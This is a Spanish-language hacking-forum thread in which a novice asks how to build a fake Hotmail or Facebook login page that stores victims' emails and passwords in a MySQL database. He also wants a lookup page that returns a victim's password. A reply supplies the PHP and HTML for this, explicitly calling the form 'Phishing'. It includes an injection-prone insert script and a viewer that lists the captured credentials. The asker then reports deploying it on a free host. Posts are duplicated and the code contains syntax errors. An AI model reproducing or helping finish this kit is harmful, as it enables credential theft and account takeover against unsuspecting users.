Bueno necesito un empujonsito para empezar... he estado leyendo bastante pero estoy muy desorientado... se que no es nada dificil de hacer, pero bue, "nadie nace sabiendo" decimos los noods cuando nos retan
Ok... lo que quiero hacer es un fake que solicite email y contraseña (hotmail, facebook, cualquiera)y que envie el formulario a una base de datos para poder consultarlo en una pagina con un buscador caso que cuando ponga el email me diga la clave... se habra entendido??
Lo he visto y se me ha puesto que quiero saber como se hace...
Osea lo que quiero es aprender el metodo., se que hay formas mas faciles como mandar los logs a un .txt y listo, pero lo que quiero no es robar password sino aprender a usar bases de datos, aprender un poco de php etc y me parecio divertido intentar eso que no debe ser muy dificil... nose por donde empezar.. espero que puedan ayudarme....
saludos y gracias!!
Cómo has dicho necesitas trabajar con mysql y con PHP . Añadir dentro del formulario las conexiones a la db y que despues si quieres te lo de en un archivo html . Te pongo un ejemplo haber si te ayuda.
Esto sería para extraer los resultados :
<style type="text/css"> Esto no es necesario pero es para darle color al texto resultante del HTMl
<!--
body,td,th {
color: #FFFFFF;
}
-->
</style><?php
$con = mysql_connect("Ip ","nombre de usuario de la base de datos","contraseña");
if (!$con)
{
die('No se ha podido conectar... algo mal hay en los datos anteriores..: ' . mysql_error());
} * Da este error en el caso que los datos anteriores sean incorrectos
mysql_select_db("Nombre de la base de datos", $con);
$result = mysql_query("SELECT * FROM Nombre de la tabla");
Aqui crea una tabla donde se mostrarán los resultados que se obtengan de extraer las tablas
echo "<center><table border='1'>
<tr>
<th>Email</th>
<th>Contraseña
</tr>";
while($row = mysql_fetch_array($result))
{
echo "<tr>";
echo "<td>" . $row['email'] . "</td>";
echo "<td>" . $row['contraseña'] . "</td>";
echo "</tr>";
}
echo "</table>";
mysql_close($con);
?>
Ahora faltaria lo más importante que es escribir en la base de datos :
Creas un formulario HTmL donde se encuentra el Phishing
<html>
<body>
<form action="insertar.php (el que llama)" method="post">
Firstname: <input type="text" name="Email" />
Lastname: <input type="text" name="Contraseña" />
<input type="submit" />
</form>
</body>
</html>
Después que se hayan rellenado los datos se llamará un archivo PHP que se llamará en este caso insertar.php ( lo creas a parte) (es el que va a escribir en la base de datos )
Ahora procedamos a la creacion de "insertar.php"
<?php
$con = mysql_connect("Ip","usuario","contraseña");
if (!$con)
{
die('No se ha podido estrablecer la conexión : ' . mysql_error());
}
$sql="INSERT INTO Tabla (emal , contraseña,)
VALUES
('$_POST[email]','$_POST[contraseña]',
if (!mysql_query($sql,$con))
{
die('Error: ' . mysql_error());
}
echo "Se ha añadido conrrectamente";
mysql_close($con)
?>
Listo eso es todo o lo que entendi de tu pregunta
Esto sería para extraer los resultados :
<style type="text/css"> Esto no es necesario pero es para darle color al texto resultante del HTMl
<!--
body,td,th {
color: #FFFFFF;
}
-->
</style><?php
$con = mysql_connect("Ip ","nombre de usuario de la base de datos","contraseña");
if (!$con)
{
die('No se ha podido conectar... algo mal hay en los datos anteriores..: ' . mysql_error());
} * Da este error en el caso que los datos anteriores sean incorrectos
$result = mysql_query("SELECT * FROM Nombre de la tabla");
Aqui crea una tabla donde se mostrarán los resultados que se obtengan de extraer las tablas
echo "<center><table border='1'>
<tr>
<th>Email</th>
<th>Contraseña
</tr>";
while($row = mysql_fetch_array($result))
{
echo "<tr>";
echo "<td>" . $row['email'] . "</td>";
echo "<td>" . $row['contraseña'] . "</td>";
echo "</tr>";
}
echo "</table>";
mysql_close($con);
?>
Ahora faltaria lo más importante que es escribir en la base de datos :
Creas un formulario HTmL donde se encuentra el Phishing
<html>
<body>
<form action="insertar.php (el que llama)" method="post">
Firstname: <input type="text" name="Email" />
Lastname: <input type="text" name="Contraseña" />
<input type="submit" />
</form>
</body>
</html>
Después que se hayan rellenado los datos se llamará un archivo PHP que se llamará en este caso insertar.php ( lo creas a parte) (es el que va a escribir en la base de datos )
Ahora procedamos a la creacion de "insertar.php"
<?php
$con = mysql_connect("Ip","usuario","contraseña");
if (!$con)
{
die('No se ha podido estrablecer la conexión : ' . mysql_error());
}
$sql="INSERT INTO Tabla (emal , contraseña,)
VALUES
('$_POST[email]','$_POST[contraseña]',
if (!mysql_query($sql,$con))
{
die('Error: ' . mysql_error());
}
echo "Se ha añadido conrrectamente";
mysql_close($con)
?>
Listo eso es todo o lo que entendi de tu pregunta
muchisimas gracias! ... todavia no lo veo bien.,, pero he estado haciendo algo MUY parecido, y me da error
mysql_connect() [function.mysql-connect]: Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)
pero bueno voy a seguir intentando con esete code q pusiste y te cuento... gracias!
edito: La lo testie... luego de enviar el formulario me da el siguiente error: Parse error: syntax error, unexpected $end in /home/freehost/t35.com/m/a/matiasvizk/files/insertar.php on line 19 y a la base de datos no llega nada :S... debe haber un pequeño error... on line 19
VUELVO A EDITAR: Ya lo solucione... era un error de sintaxis dentro de values... pero persiste el error : No se ha podido estrablecer la conexión : Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2) stats... alguien sabe como solucionarlo!?!?!??!
[Enlace externo eliminado para invitados]
mysql_connect() [function.mysql-connect]: Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)
pero bueno voy a seguir intentando con esete code q pusiste y te cuento... gracias!
edito: La lo testie... luego de enviar el formulario me da el siguiente error: Parse error: syntax error, unexpected $end in /home/freehost/t35.com/m/a/matiasvizk/files/insertar.php on line 19 y a la base de datos no llega nada :S... debe haber un pequeño error... on line 19
VUELVO A EDITAR: Ya lo solucione... era un error de sintaxis dentro de values... pero persiste el error : No se ha podido estrablecer la conexión : Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2) stats... alguien sabe como solucionarlo!?!?!??!
Creo que tienes un error en la configuracion de la Ip , no te puedo decir con seguridad , porque no he usado nunca ese host ¿que pusistes en Ip? Localhost? o que...XDmatiasvizk escribió:muchisimas gracias! ... todavia no lo veo bien.,, pero he estado haciendo algo MUY parecido, y me da error
sip localhost
TEMA SOLUCIONADO ... agradezco a 2 personas y a una maquina. FUCK BY WES por su ayudita por msn, a yeikel por responder, me sirvio mucho tu respuesta y por ultimo a [Enlace externo eliminado para invitados], ya saben
saludos y gracias.- !
pd: si algun novatin igual que yo necesita ayuda con esto, mande un pm.
saludos y gracias.- !
pd: si algun novatin igual que yo necesita ayuda con esto, mande un pm.